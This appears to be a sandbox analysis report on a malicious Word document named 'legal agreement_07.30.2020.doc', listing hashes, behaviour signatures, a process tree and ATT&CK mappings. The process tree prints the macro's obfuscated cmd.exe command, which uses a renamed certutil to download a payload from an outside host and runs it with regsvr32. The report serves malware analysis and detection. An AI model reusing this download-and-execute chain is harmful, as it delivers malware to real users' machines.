Overview

overview

10

Static

static

legal agre...20.doc

windows7_x64

10

legal agre...20.doc

windows10_x64

10

Analysis

  • max time kernel
    146s
  • max time network
    23s
  • platform
    windows7_x64
  • resource
    win7v200722
  • submitted
    31-07-2020 13:03

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    legal agreement_07.30.2020.doc

  • Size

    103KB

  • MD5

    b3b0dffa00f1a93dd4f4069d87f43dd3

  • SHA1

    756fe15d649645f5d9c3ef60dcd6d6ba5384633e

  • SHA256

    e67aa7a4192ca035c6c52a6afaf1b03058b9baa6fde616db3dad9d8d3d4c24cc

  • SHA512

    fe57b509a42cf017bc17d7b84d69ffb9c8de4e7240ef4056caf4e91fda39fee16b0019a4c6fba521f7278d99d857b9ef1374329177a70cc5b6ccc1bf44fd0202

Score
10/10
discovery

Malware Config

Signatures

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Suspicious use of SetWindowsHookEx 16 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs
  • Executes dropped EXE 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\legal agreement_07.30.2020.doc"
    1⤵
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:844
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c "set u=url&&call C:\ProgramData\1.exe /%u%^c^a^c^h^e^ /f^ http://bofzvaxf6.com/bolb/jaent.php?l=liut1.cab C:\ProgramData\1.tmp && call regsvr32 C:\ProgramData\1.tmp"
      2⤵
      • Process spawned unexpected child process
      • An obfuscated cmd.exe command-line is typically used to evade detection.
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1036
      • C:\ProgramData\1.exe
        C:\ProgramData\1.exe /urlcache /f http://bofzvaxf6.com/bolb/jaent.php?l=liut1.cab C:\ProgramData\1.tmp
        3⤵
        • Executes dropped EXE
        PID:1532

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1
T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads